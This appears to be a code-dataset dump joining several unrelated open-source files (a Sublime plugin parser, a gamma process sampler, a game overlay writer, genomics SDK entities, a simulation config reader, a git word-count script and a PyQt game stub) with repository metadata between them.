for key, item in data.items():
try:
args = dict(defaults)
args.update(item)
args['flags'] = flags.from_string(str(args['flags']))
if flags.check_platform(args['flags']):
if args['keys']:
args['keys'] = self._map_keybinding(args['keys'])
self.commands[key] = Command(**args)
except Exception as exception:
suricate.log('WARNING: Command %r not added: %s', key, exception)
@staticmethod
def _rupdate(lhs, rhs):
for key, irhs in rhs.items():
ilhs = lhs.get(key, {})
ilhs.update(irhs)
lhs[key] = ilhs
@staticmethod
def _remove_key_bindings(data):
for item in data.values():
if 'keys' in item:
item.pop('keys')
def _get_commands(self, profile, key):
data = profile.get(key, {})
return dict((k, self._merge_platform_specific_tags(v)) for k, v in data.items())
@staticmethod
def _merge_platform_specific_tags(raw_data):
data = {}
for tag in _TAG_LIST:
os_tag = tag + '.' + _PLATFORM
if os_tag in raw_data:
data[tag] = raw_data[os_tag]
elif tag in raw_data:
data[tag] = raw_data[tag]
return data
def _map_keybinding(self, keybinding):
# Override <c>+o.
if self.override_ctrl_o and keybinding[0] == '<c>+o':
keybinding = [self.override_ctrl_o] + keybinding[1:]
# Map keys by platform.
for key, value in self.os_key_map.items():
keybinding = [x.replace(key, value) for x in keybinding]
return keybinding
def parse_profiles(profiles):
assert suricate.api_is_ready()
parser = _CommandParser(suricate.load_settings())
for profile_file_name in profiles:
profile = sublime.load_settings(profile_file_name)
parser.parse(profile)
return parser.commands
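# Illustrative profile entry (hedged sketch: the command name and call target
# are made up; tag names follow _TAG_LIST, and the ".windows" suffix shows the
# platform-specific form resolved by _merge_platform_specific_tags):
# "commands": {
#     "show_log": {
#         "call": "some_module.show_log",
#         "caption": "Show log",
#         "keys": ["<c>+o", "l"],
#         "keys.windows": ["<c>+l"]
#     }
# }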
|
gpl-3.0
| -5,906,764,279,225,393,000
| 33.099099
| 97
| 0.575429
| false
| 3.788789
| false
| false
| false
|
arongdari/sparse-graph-prior
|
sgp/GGPrnd.py
|
1
|
3729
|
import warnings
import numpy as np
from scipy.special import gamma, gammaln
def W(t, x, alpha, sigma, tau):
if tau > 0:
logout = np.log(alpha) + np.log(1. - np.exp(-tau * (x - t))) + (-1 - sigma) * np.log(t) + (-t * tau) - np.log(
tau) - gammaln(1. - sigma)
else:
logout = np.log(alpha) - gammaln(1. - sigma) - np.log(sigma) + np.log(t ** (-sigma) - x ** (-sigma))
return np.exp(logout)
def inv_W(t, x, alpha, sigma, tau):
if tau > 0:
out = t - 1. / tau * np.log(1. - gamma(1. - sigma) * x * tau / (alpha * t ** (-1. - sigma) * np.exp(-t * tau)))
else:
logout = -1. / sigma * np.log(t ** (-sigma) - sigma * gamma(1. - sigma) / alpha * x)
out = np.exp(logout)
return out
def GGPrnd(alpha, sigma, tau, T=0):
"""
GGPrnd samples points of a generalised gamma process
Samples the points of the GGP with Levy measure
alpha/Gamma(1-sigma) * w^(-1-sigma) * exp(-tau*w)
For sigma>=0, it samples points above the threshold T>0 using the adaptive
thinning strategy described in Favaro and Teh (2013).
    Converted from the same function in the BNPGraph Matlab package by Francois Caron
http://www.stats.ox.ac.uk/~caron/code/bnpgraph/index.html
Reference:
S. Favaro and Y.W. Teh. MCMC for normalized random measure mixture
models. Statistical Science, vol.28(3), pp.335-359, 2013.
:param alpha: positive scalar
:param sigma: real in (-Inf, 1)
:param tau: positive scalar
:param T: truncation threshold; positive scalar
:return:
N: weights from the GGP
T: threshold
"""
# finite activity GGP, don't need to truncate
if sigma < 0:
rate = np.exp(np.log(alpha) - np.log(-sigma) + sigma * np.log(tau))
K = np.random.poisson(rate)
N = np.random.gamma(-sigma, scale=1. / tau, size=K)
T = 0
return N, T
# infinite activity GGP
if T == 0:
# set the threshold automatically
# Number of jumps of order alpha/sigma/Gamma(1-sigma) * T^{-sigma} for sigma > 0
# and alpha*log(T) for sigma = 0
if sigma > .1:
Njumps = 20000
T = np.exp(1. / sigma * (np.log(alpha) - np.log(sigma) - gammaln(1. - sigma) - np.log(Njumps)))
else:
T = 1e-10
if sigma > 0:
Njumps = np.floor(alpha / sigma / gamma(1. - sigma) * T ** (-sigma))
else:
Njumps = np.floor(-alpha * np.log(T))
else:
if T <= 0:
raise ValueError("Threshold T must be strictly positive")
if sigma > 1e-3:
Njumps = np.floor(alpha / sigma / gamma(1. - sigma) * T ** (-sigma))
else:
Njumps = np.floor(-alpha * np.log(T))
    if Njumps > 1e7:
        # Warn rather than abort; raising a Warning instance here would stop the sampler.
        warnings.warn("Expected number of jumps = %d" % Njumps)
# Adaptive thinning strategy
N = np.zeros(int(np.ceil(Njumps + 3 * np.sqrt(Njumps))))
k = 0
t = T
count = 0
while True:
e = -np.log(np.random.random()) # Sample exponential random variable of unit rate
if e > W(t, np.inf, alpha, sigma, tau):
N = N[0:k]
return N, T
else:
t_new = inv_W(t, e, alpha, sigma, tau)
if tau == 0 or np.log(np.random.random()) < (-1. - sigma) * np.log(t_new / t):
# if tau>0, adaptive thinning - otherwise accept always
                if k >= len(N):  # grow the buffer before writing past its end
                    N = np.append(N, np.zeros(int(Njumps)))
N[k] = t_new
k += 1
t = t_new
count += 1
if count > 10e8:
                # If the loop runs too long, lower the threshold T and rerun
T /= 10.
N, T = GGPrnd(alpha, sigma, tau, T)
return N, T
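if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): sample GGP jumps
    # with illustrative parameter values and print a quick summary.
    N, T = GGPrnd(alpha=100., sigma=0.5, tau=1.)
    print("sampled %d jumps above threshold %g, total mass %g"
          % (len(N), T, N.sum()))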
|
mit
| 3,136,497,266,407,477,000
| 33.211009
| 119
| 0.53875
| false
| 3.179028
| false
| false
| false
|
BrandonNowlin/RebirthItemTracker
|
src/view_controls/overlay.py
|
1
|
2633
|
"""
This module deals with everything related to the overlay text generated,
as well as formating how to display stats
"""
from game_objects.item import ItemInfo
class Overlay(object):
"""The main class to handle output to overlay text files"""
def __init__(self, prefix, tracker_state):
self.state = tracker_state
self.prefix = prefix
@staticmethod
def format_value(value):
"""Format a float value for displaying"""
        # NOTE: this helper is also used outside this class
# Round to 2 decimal places then ignore trailing zeros and trailing periods
# Doing just 'rstrip("0.")' breaks on "0.00"
display = format(value, ".2f").rstrip("0").rstrip(".")
# For example, set "0.6" to ".6"
if abs(value) < 1 and value != 0:
display = display.lstrip("0")
if value > -0.00001:
display = "+" + display
return display
@staticmethod
def format_transform(transform_set):
"""Format a transform_set for displaying"""
        # NOTE: this helper is also used outside this class
if len(transform_set) >= 3:
return "yes"
else:
return str(len(transform_set))
def update_stats(self, stat_list=None, transform_list=None):
"""
Update file content for a subset (or all) the player's stats.
stat_list provide the subset of stats to update, if None it will update everything
"""
if stat_list is None:
stat_list = ItemInfo.stat_list
for stat in stat_list:
display = Overlay.format_value(self.state.player_stats[stat])
with open(self.prefix + "overlay text/" + stat + ".txt", "w+") as sfile:
sfile.write(display)
if transform_list is None:
transform_list = ItemInfo.transform_list
for transform in transform_list:
display = Overlay.format_transform(self.state.player_transforms[transform])
with open(self.prefix + "overlay text/" + transform + ".txt", "w+") as sfile:
sfile.write(display)
def update_last_item_description(self):
"""Update the overlay file for item pickup description"""
item = self.state.last_item
desc = item.info.name
desc += ": " + item.generate_item_description()
with open(self.prefix + "overlay text/itemInfo.txt", "w+") as sfile:
sfile.write(desc)
def update_seed(self):
"""Update the overlay file the seed"""
with open(self.prefix + "overlay text/seed.txt", "w+") as sfile:
sfile.write(self.state.seed)
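if __name__ == '__main__':
    # Hedged checks of the static helpers above; the full class needs tracker
    # state objects, so only the staticmethods are exercised here.
    assert Overlay.format_value(0.5) == "+.5"
    assert Overlay.format_value(2.0) == "+2"
    assert Overlay.format_value(-0.6) == "-0.6"
    assert Overlay.format_transform({"a", "b", "c"}) == "yes"
    assert Overlay.format_transform({"a"}) == "1"
    print("formatting helpers behave as documented")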
|
bsd-2-clause
| 2,913,179,788,774,310,000
| 37.15942
| 90
| 0.602735
| false
| 4.088509
| false
| false
| false
|
icgc-dcc/SONG
|
song-python-sdk/overture_song/entities.py
|
1
|
9524
|
import json
from dataclasses import asdict, dataclass, is_dataclass
from typing import Any, List, Type
from overture_song.validation import Validatable
from overture_song.utils import Builder, check_state, check_type, default_value
class Entity(object):
def to_json(self):
return json.dumps(self.to_dict(), indent=4)
def to_dict(self):
if is_dataclass(self):
return asdict(self)
else:
            raise NotImplementedError("not implemented for non-dataclass object")
def __str__(self):
return self.to_json()
@dataclass(frozen=False)
class Metadata(Entity):
info: dict = None
def __post_init__(self):
self.info = {}
def set_info(self, key: str, value: Any):
self.info[key] = value
def add_info(self, data: dict):
if data is None:
return
self.info.update(data)
@dataclass(frozen=False)
class Study(Metadata, Validatable):
studyId: str = None
name: str = None
organization: str = None
description: str = None
def validate(self):
        raise NotImplementedError("not implemented")
@classmethod
def create(cls, studyId, name=None, description=None, organization=None):
s = Study()
s.studyId = studyId
s.name = name
s.description = description
s.organization = organization
return s
@classmethod
def create_from_raw(cls, study_obj):
return Study.create(
study_obj.studyId,
name=study_obj.name,
description=study_obj.description,
organization=study_obj.organization)
@dataclass(frozen=False)
class File(Metadata, Validatable):
objectId: str = None
analysisId: str = None
fileName: str = None
studyId: str = None
fileSize: int = -1
fileType: str = None
fileMd5sum: str = None
fileAccess: str = None
def validate(self):
        raise NotImplementedError("not implemented")
@classmethod
def create(cls, fileName, fileSize, fileType, fileMd5sum,
fileAccess, studyId=None, analysisId=None, objectId=None, info=None):
f = File()
f.objectId = objectId
f.analysisId = analysisId
f.studyId = studyId
f.fileType = fileType
f.fileSize = fileSize
f.info = default_value(info, {})
f.fileMd5sum = fileMd5sum
f.fileAccess = fileAccess
f.fileName = fileName
return f
@dataclass(frozen=False)
class Sample(Metadata, Validatable):
sampleId: str = None
specimenId: str = None
sampleSubmitterId: str = None
sampleType: str = None
def validate(self):
        raise NotImplementedError("not implemented")
@classmethod
def create(cls, specimenId, sampleSubmitterId,
sampleType, sampleId=None, info=None):
s = Sample()
s.info = default_value(info, {})
s.specimenId = specimenId
s.sampleType = sampleType
s.sampleSubmitterId = sampleSubmitterId
s.sampleId = sampleId
return s
@dataclass(frozen=False)
class Specimen(Metadata, Validatable):
specimenId: str = None
donorId: str = None
specimenSubmitterId: str = None
specimenClass: str = None
specimenType: str = None
def validate(self):
        raise NotImplementedError("not implemented")
@classmethod
def create(cls, donorId, specimenSubmitterId, specimenClass, specimenType,
specimenId=None, info=None):
s = Specimen()
s.info = default_value(info, {})
s.specimenId = specimenId
s.donorId = donorId
s.specimenType = specimenType
s.specimenClass = specimenClass
s.specimenSubmitterId = specimenSubmitterId
return s
@dataclass(frozen=False)
class Donor(Metadata, Validatable):
donorId: str = None
donorSubmitterId: str = None
studyId: str = None
donorGender: str = None
def validate(self):
        raise NotImplementedError("not implemented")
@classmethod
def create(cls, donorSubmitterId, studyId, donorGender, donorId=None, info=None):
d = Donor()
d.donorId = donorId
d.info = default_value(info, {})
d.studyId = studyId
d.donorSubmitterId = donorSubmitterId
d.donorGender = donorGender
return d
@dataclass(frozen=False)
class CompositeEntity(Sample):
specimen: Type[Specimen] = None
donor: Type[Donor] = None
def validate(self):
        raise NotImplementedError("not implemented")
@classmethod
def base_on_sample(cls, sample):
s = CompositeEntity()
s.sampleId = sample.sampleId
s.sampleSubmitterId = sample.sampleSubmitterId
s.sampleType = sample.sampleType
s.info = sample.info
s.specimenId = sample.specimenId
return s
@classmethod
def create(cls, donor, specimen, sample):
c = CompositeEntity.base_on_sample(sample)
check_type(donor, Donor)
check_type(specimen, Specimen)
c.donor = donor
c.specimen = specimen
return c
@dataclass(frozen=False)
class Experiment(Metadata):
pass
@dataclass(frozen=False)
class VariantCall(Experiment, Validatable):
analysisId: str = None
variantCallingTool: str = None
matchedNormalSampleSubmitterId: str = None
def validate(self):
        raise NotImplementedError("not implemented")
@classmethod
def create(cls, variantCallingTool, matchedNormalSampleSubmitterId, analysisId=None):
s = VariantCall()
s.analysisId = analysisId
s.variantCallingTool = variantCallingTool
s.matchedNormalSampleSubmitterId = matchedNormalSampleSubmitterId
return s
@dataclass(frozen=False)
class SequencingRead(Experiment, Validatable):
analysisId: str = None
aligned: bool = None
alignmentTool: str = None
insertSize: int = None
libraryStrategy: str = None
pairedEnd: bool = None
referenceGenome: str = None
@classmethod
def builder(cls):
        return Builder(SequencingRead)
def validate(self):
        raise NotImplementedError("not implemented")
@classmethod
def create(cls, aligned, alignmentTool, insertSize,
libraryStrategy, pairedEnd, referenceGenome, analysisId=None):
s = SequencingRead()
s.alignmentTool = alignmentTool
s.aligned = aligned
s.analysisId = analysisId
s.libraryStrategy = libraryStrategy
s.insertSize = insertSize
s.pairedEnd = pairedEnd
s.referenceGenome = referenceGenome
return s
@dataclass(frozen=False)
class Analysis(Entity):
analysisId: str = None
study: str = None
analysisState: str = "UNPUBLISHED"
    sample: List[CompositeEntity] = None
    file: List[File] = None
def __post_init__(self):
self.sample = []
self.file = []
@classmethod
def builder(cls):
return Builder(Analysis)
@classmethod
def from_json(cls, json_string):
pass
@dataclass(frozen=False)
class SequencingReadAnalysis(Analysis, Validatable):
analysisType: str = "sequencingRead"
    experiment: Type[SequencingRead] = None
@classmethod
def create(cls, experiment, sample, file, analysisId=None, study=None, analysisState="UNPUBLISHED", info=None):
check_type(experiment, SequencingRead)
check_state(sample is not None and isinstance(sample, list) and len(sample) > 0,
"Atleast one sample must be defined")
check_state(file is not None and isinstance(file, list) and len(file) > 0,
"Atleast one file must be defined")
for s in sample:
check_type(s, CompositeEntity)
for f in file:
check_type(f, File)
s = SequencingReadAnalysis()
s.sample = sample
s.file = file
s.info = default_value(info, {})
s.experiment = experiment
s.analysisId = analysisId
s.study = study
s.analysisState = analysisState
return s
def validate(self):
        raise NotImplementedError("not implemented")
@dataclass(frozen=False)
class VariantCallAnalysis(Analysis, Validatable):
analysisType: str = 'variantCall'
    experiment: Type[VariantCall] = None
@classmethod
def create(cls, experiment, sample, file, analysisId=None, study=None, analysisState="UNPUBLISHED", info=None):
check_type(experiment, VariantCall)
check_state(sample is not None and isinstance(sample, list) and len(sample) > 0,
"Atleast one sample must be defined")
check_state(file is not None and isinstance(file, list) and len(file) > 0,
"Atleast one file must be defined")
for s in sample:
check_type(s, CompositeEntity)
for f in file:
check_type(f, File)
s = VariantCallAnalysis()
s.experiment = experiment
s.analysisId = analysisId
s.study = study
s.analysisState = analysisState
s.sample = sample
s.file = file
s.info = default_value(info, {})
return s
def validate(self):
        raise NotImplementedError("not implemented")
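if __name__ == "__main__":
    # Hedged construction sketch: identifiers and type strings below are
    # illustrative placeholders, not values mandated by the SONG schema.
    donor = Donor.create("donor-submitter-1", "ABC123-CA", "male")
    specimen = Specimen.create(donor.donorId, "specimen-submitter-1",
                               "Normal", "Normal - solid tissue")
    sample = Sample.create(specimen.specimenId, "sample-submitter-1", "Total RNA")
    composite = CompositeEntity.create(donor, specimen, sample)
    print(composite.to_json())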
|
gpl-3.0
| 3,801,246,344,196,846,000
| 27.011765
| 115
| 0.640487
| false
| 3.927423
| false
| false
| false
|
richardclegg/multiuservideostream
|
streamsim/src/streamOptions.py
|
1
|
11399
|
#!/usr/bin/env python
import json
import sys
import demandmodel.demandModel as demandModel
import networkmodel.networkModel as networkModel
import qoemodel.qoeModel as qoeModel
import routemodel.routeModel as routeModel
import servermodel.serverModel as serverModel
import sessionmodel.sessionModel as sessionModel
import outputmodel.outputModel as outputModel
class streamOptions(object):
def __init__(self):
"""Initialise the streamOptions class which contains
the information read from the configuration file for
the simulation"""
self.outputFile= None
self.routeMod= None
self.sessionMod= None
self.netMod= None
self.demMod= None
self.qoeMod= None
self.serverMod= None
self.outputs= []
self.simDays= 0
def readJson(self,fName):
"""Read a JSON file containing the options for the
file and read any subsidiary files included in that
file"""
try:
f= open(fName)
except:
print >> sys.stderr,'Cannot open',fName
return False
try:
js=json.load(f)
except ValueError as e:
print >> sys.stderr, 'JSON parse error in',fName
print >> sys.stderr, e
sys.exit()
f.close()
try:
outPart= js.pop('output')
        except KeyError:
outPart= None
try:
sessModel= js.pop('session_model')
dModel= js.pop('demand_model')
nModel= js.pop('network_model')
rModel= js.pop('route_model')
qModel= js.pop('qoe_model')
svrModel= js.pop('server_model')
outputs= js.pop('output_models')
self.simDays= js.pop('simulation_days')
        except KeyError:
            print >> sys.stderr, 'JSON file',fName, \
                'must contain session_model, demand_model, network_model, ' \
                'route_model, qoe_model, server_model, output_models and simulation_days'
return False
if type(self.simDays) != int:
print >> sys.stderr, 'JSON file',fName, \
'must specify simulation_days as integer'
return False
if not self.checkJSEmpty(js,fName):
return False
try:
if outPart != None:
self.parseOutPart(outPart,fName)
self.parseSessionModel(sessModel,fName)
self.parseDemandModel(dModel,fName)
self.parseNetworkModel(nModel,fName)
self.parseRouteModel(rModel,fName)
self.parseQoeModel(qModel,fName)
self.parseServerModel(svrModel,fName)
for o in outputs:
self.outputs.append(self.parseOutputModel(o,fName))
except ValueError as e:
return False
return True
def checkJSEmpty(self,js,fName):
if (len(js) != 0):
print >> sys.stderr, 'JSON file',fName, \
'contains unrecognised keys',js.keys()
return False
return True
def parseOutPart(self,js,fName):
""" Parse the output part of the stream model JSON config"""
try:
self.outputFile= js.pop('file')
        except KeyError:
pass
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in file",fName
raise ValueError
def strToClassInstance(self,classStr,classType):
"""Convert string to a class instance"""
try:
(modName,_,className)= classStr.rpartition('.')
newmodule= __import__(modName, fromlist=[''])
objClass= getattr(newmodule,className)
except AttributeError as e:
print >> sys.stderr, "Making ",classStr,"into class",classType, \
"Attribute Error", e
raise ValueError("%s must be qualified class." % classStr)
except ImportError as e:
print >> sys.stderr, "Making ",classStr,"into class",classType, \
"Attribute Error", e
raise ValueError("Cannot find class %s module name %s to import"
% (className,modName))
obj= objClass()
if isinstance(obj,classType):
return obj
raise ValueError("%s is not a valid class of type sessionModel." % classStr)
def parseSessionModel(self,js,fName):
""" Parse the session Model part of the stream model
JSON config"""
try:
modelStr= js.pop('type')
        except KeyError:
            print >> sys.stderr,'JSON file',fName, \
                'session_model must contain type'
            raise ValueError('session_model must contain type')
try:
self.sessionMod= self.strToClassInstance(modelStr,
sessionModel.sessionModel)
self.sessionMod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr,'JSON file',fName, \
'has error with type in session_model'
print >> sys.stderr, e
raise e
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in file",fName
raise ValueError
def parseDemandModel(self,js,fName):
""" Parse the demand Model part of the stream model
JSON config"""
try:
demModType= js.pop('type')
        except KeyError:
            print >> sys.stderr, "demand_model in JSON must contain " \
                "type in JSON ",fName
            raise ValueError('demand_model must contain type')
try:
self.demMod= self.strToClassInstance(demModType,
demandModel.demandModel)
except ValueError as e:
print >> sys.stderr,"JSON in demand_model has error with " \
"type in",fName
print >> sys.stderr, e
raise e
try:
self.demMod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr, "Parsing error with JSON in",\
"demand_model in",fName
print >> sys.stderr, "Error given:",e
raise e
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in file",fName
raise ValueError
def parseNetworkModel(self, js, fName):
"""Parse the network model from the JSON"""
try:
netModType= js.pop('type')
        except KeyError:
            print >> sys.stderr, "network_model in JSON must contain " \
                "type in JSON ",fName
            raise ValueError('network_model must contain type')
try:
self.netMod= self.strToClassInstance(netModType,
networkModel.networkModel)
except Exception as e:
print >> sys.stderr,"JSON in network_model has error with" \
"type in",fName
print >> sys.stderr, e
raise e
try:
self.netMod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr, "Parsing error with JSON in ",\
"network_model in",fName
print >> sys.stderr, e
raise e
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in file",fName
raise ValueError
def parseRouteModel(self, js, fName):
"""Parse the route model from the JSON"""
try:
routeModType= js.pop('type')
        except KeyError:
            print >> sys.stderr, "route_model in JSON must contain " \
                "type in JSON ",fName
            raise ValueError('route_model must contain type')
try:
self.routeMod= self.strToClassInstance(routeModType,
routeModel.routeModel)
except Exception as e:
print >> sys.stderr,"JSON in route_model has error with" \
"type in",fName
print >> sys.stderr, e
raise e
try:
self.routeMod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr, "Parsing error with JSON in ",\
"route_model in",fName
print >> sys.stderr, e
raise e
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in file",fName
raise ValueError
def parseQoeModel(self, js, fName):
""" Parse the model for user quality of experience from the
JSON config input"""
try:
qoeModType= js.pop('type')
        except KeyError:
            print >> sys.stderr, "qoe_model in JSON must contain " \
                "type in JSON ",fName
            raise ValueError('qoe_model must contain type')
try:
self.qoeMod= self.strToClassInstance(qoeModType,
qoeModel.qoeModel)
except ValueError as e:
print >> sys.stderr,"JSON in qoe_model has error with", \
"type in",fName
print >> sys.stderr, e
raise e
try:
self.qoeMod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr, "Parsing error with JSON in ",\
"qoe_model in",fName
print >> sys.stderr, e
raise e
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in file",fName
raise ValueError
def parseServerModel(self,js, fName):
"""Parse the model which learns about and assigns servers"""
try:
serverModType= js.pop('type')
        except KeyError:
            print >> sys.stderr, "server_model in JSON must contain " \
                "type in JSON ",fName
            raise ValueError('server_model must contain type')
try:
self.serverMod= self.strToClassInstance(serverModType,
serverModel.serverModel)
except ValueError as e:
print >> sys.stderr,"JSON in server_model has error with", \
"type in",fName
print >> sys.stderr, e
raise e
try:
self.serverMod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr, "Parsing error with JSON in ",\
"server_model in",fName
print >> sys.stderr, e
raise e
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in server_model in file",fName
raise ValueError
def parseOutputModel(self, js, fName):
"""Parse one of the models which gives output"""
try:
omType= js.pop('type')
        except KeyError:
            print >> sys.stderr, "Every instance of output_models in JSON must contain " \
                "type ",fName
            raise ValueError('output_models entries must contain type')
try:
outputmod= self.strToClassInstance(omType,
outputModel.outputModel)
except ValueError as e:
print >> sys.stderr,"JSON in server_model has error with", \
"type in",fName
print >> sys.stderr, e
raise e
try:
outputmod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr, "Parsing error with JSON in",\
"output_models in",fName
print >> sys.stderr, "Error given:",e
raise e
return outputmod
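# Hedged sketch of the configuration layout expected by readJson above; the
# dotted "type" values are illustrative placeholders, not real class paths:
# {
#     "simulation_days": 7,
#     "output": {"file": "results.txt"},
#     "session_model": {"type": "sessionmodel.someSessionModel"},
#     "demand_model":  {"type": "demandmodel.someDemandModel"},
#     "network_model": {"type": "networkmodel.someNetworkModel"},
#     "route_model":   {"type": "routemodel.someRouteModel"},
#     "qoe_model":     {"type": "qoemodel.someQoeModel"},
#     "server_model":  {"type": "servermodel.someServerModel"},
#     "output_models": [{"type": "outputmodel.someOutputModel"}]
# }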
|
mpl-2.0
| 8,610,475,788,309,808,000
| 35.072785
| 89
| 0.547855
| false
| 4.317803
| false
| false
| false
|
jarus/git-wcount-diff
|
git_wcount_diff.py
|
1
|
1753
|
import sys
import subprocess
import re
files_re = re.compile(r"diff --git a/(.+?) b/.+?")
additions_re = re.compile(r"{\+(.*?)\+}")
deletions_re = re.compile(r"\[-(.*?)-\]")
word_re = re.compile(r"\S*")
def count(regex, source):
words = 0
characters = 0
for match in regex.findall(source):
for word in word_re.findall(match.decode('utf8')):
if len(word) == 0:
continue
words += 1
characters += len(word)
return words, characters
def analyse_file(filename, rev_1, rev_2):
git_diff = subprocess.Popen(
'git diff --word-diff %s %s -- "%s"' % (rev_1, rev_2, filename),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
stdout, stderr = git_diff.communicate()
if git_diff.returncode > 0:
print stderr
sys.exit(2)
return count(additions_re, stdout), count(deletions_re, stdout)
def main():
if len(sys.argv) < 3:
print "Usage: git-wcount-diff <commit> <commit>"
sys.exit(1)
git_diff = subprocess.Popen(
"git diff %s %s --name-only" % (sys.argv[1], sys.argv[2]),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
stdout, stderr = git_diff.communicate()
if git_diff.returncode > 0:
print stderr
sys.exit(2)
files = {}
for git_file in stdout.splitlines():
files[git_file] = analyse_file(git_file, sys.argv[1], sys.argv[2])
for filename, (additions, deletions) in files.items():
print "File: %s" % filename
print " - Additions: %s Words %s Characters" % additions
print " - Deletions: %s Words %s Characters" % deletions
if __name__ == '__main__':
main()
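# Example invocation (hedged), run from inside a git work tree:
#   python git_wcount_diff.py v1.0 v2.0
# For each changed file it prints word and character counts for the
# {+additions+} and [-deletions-] produced by `git diff --word-diff`.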
|
bsd-3-clause
| -7,602,571,264,804,953,000
| 26.825397
| 74
| 0.572162
| false
| 3.358238
| false
| false
| false
|
Royal-Society-of-New-Zealand/NZ-ORCID-Hub
|
orcid_api_v3/models/research_resource_group_v30_rc2.py
|
1
|
5775
|
# coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from orcid_api_v3.models.external_i_ds_v30_rc2 import ExternalIDsV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.last_modified_date_v30_rc2 import LastModifiedDateV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.research_resource_summary_v30_rc2 import ResearchResourceSummaryV30Rc2 # noqa: F401,E501
class ResearchResourceGroupV30Rc2(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'last_modified_date': 'LastModifiedDateV30Rc2',
'external_ids': 'ExternalIDsV30Rc2',
'research_resource_summary': 'list[ResearchResourceSummaryV30Rc2]'
}
attribute_map = {
'last_modified_date': 'last-modified-date',
'external_ids': 'external-ids',
'research_resource_summary': 'research-resource-summary'
}
def __init__(self, last_modified_date=None, external_ids=None, research_resource_summary=None): # noqa: E501
"""ResearchResourceGroupV30Rc2 - a model defined in Swagger""" # noqa: E501
self._last_modified_date = None
self._external_ids = None
self._research_resource_summary = None
self.discriminator = None
if last_modified_date is not None:
self.last_modified_date = last_modified_date
if external_ids is not None:
self.external_ids = external_ids
if research_resource_summary is not None:
self.research_resource_summary = research_resource_summary
@property
def last_modified_date(self):
"""Gets the last_modified_date of this ResearchResourceGroupV30Rc2. # noqa: E501
:return: The last_modified_date of this ResearchResourceGroupV30Rc2. # noqa: E501
:rtype: LastModifiedDateV30Rc2
"""
return self._last_modified_date
@last_modified_date.setter
def last_modified_date(self, last_modified_date):
"""Sets the last_modified_date of this ResearchResourceGroupV30Rc2.
:param last_modified_date: The last_modified_date of this ResearchResourceGroupV30Rc2. # noqa: E501
:type: LastModifiedDateV30Rc2
"""
self._last_modified_date = last_modified_date
@property
def external_ids(self):
"""Gets the external_ids of this ResearchResourceGroupV30Rc2. # noqa: E501
:return: The external_ids of this ResearchResourceGroupV30Rc2. # noqa: E501
:rtype: ExternalIDsV30Rc2
"""
return self._external_ids
@external_ids.setter
def external_ids(self, external_ids):
"""Sets the external_ids of this ResearchResourceGroupV30Rc2.
:param external_ids: The external_ids of this ResearchResourceGroupV30Rc2. # noqa: E501
:type: ExternalIDsV30Rc2
"""
self._external_ids = external_ids
@property
def research_resource_summary(self):
"""Gets the research_resource_summary of this ResearchResourceGroupV30Rc2. # noqa: E501
:return: The research_resource_summary of this ResearchResourceGroupV30Rc2. # noqa: E501
:rtype: list[ResearchResourceSummaryV30Rc2]
"""
return self._research_resource_summary
@research_resource_summary.setter
def research_resource_summary(self, research_resource_summary):
"""Sets the research_resource_summary of this ResearchResourceGroupV30Rc2.
:param research_resource_summary: The research_resource_summary of this ResearchResourceGroupV30Rc2. # noqa: E501
:type: list[ResearchResourceSummaryV30Rc2]
"""
self._research_resource_summary = research_resource_summary
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ResearchResourceGroupV30Rc2, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ResearchResourceGroupV30Rc2):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
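# Hedged usage note (not part of the generated file): instances serialise via
# to_dict()/to_str(), e.g.
#   group = ResearchResourceGroupV30Rc2()
#   print(group.to_dict())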
|
mit
| 6,240,323,661,696,474,000
| 33.789157
| 122
| 0.629264
| false
| 3.899392
| false
| false
| false
|
gvpavlov/Insaniquarium
|
insaniquarium/gui/aquarium.py
|
1
|
5488
|
import os
import sys
from PyQt5.QtWidgets import QApplication, QWidget
from PyQt5 import QtCore
from PyQt5 import QtGui
current_directory = os.path.dirname(os.path.abspath(__file__))
parent_directory = os.path.abspath(os.path.join(current_directory, os.pardir))
resource_directory = os.path.join(current_directory, "resources")
